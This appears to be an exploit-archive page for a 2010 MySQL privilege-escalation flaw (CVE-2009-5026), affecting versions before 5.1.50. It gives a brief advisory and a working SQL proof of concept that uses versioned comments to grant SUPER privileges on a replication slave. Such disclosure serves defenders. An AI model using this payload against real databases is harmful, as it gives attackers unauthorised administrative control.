[] NeoSense
E X P L O I T S
title author type platform port cve id

Oracle MySQL < 5.1.50 - Privilege Escalation

Author: Libing Song
type: remote
platform: multiple
port: 
date_added: 2010-08-03 
date_updated: 2014-09-26 
verified: 1 
codes: CVE-2009-5026;OSVDB-82120 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/43677/info

MySQL is prone to a remote privilege-escalation vulnerability.

An attacker can exploit this issue to run arbitrary SQL statements with 'SUPER' privileges on the slave database system. This will allow the attacker to compromise the affected database system.

This issue affects versions prior to MySQL 5.1.50.

UPDATE db1.tbl1 /*!514900 ,mysql.user */
SET db1.tbl1.col1=2 /*!514900 ,mysql.user.Super_priv='Y'
WHERE mysql.user.User='user1'*/;
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.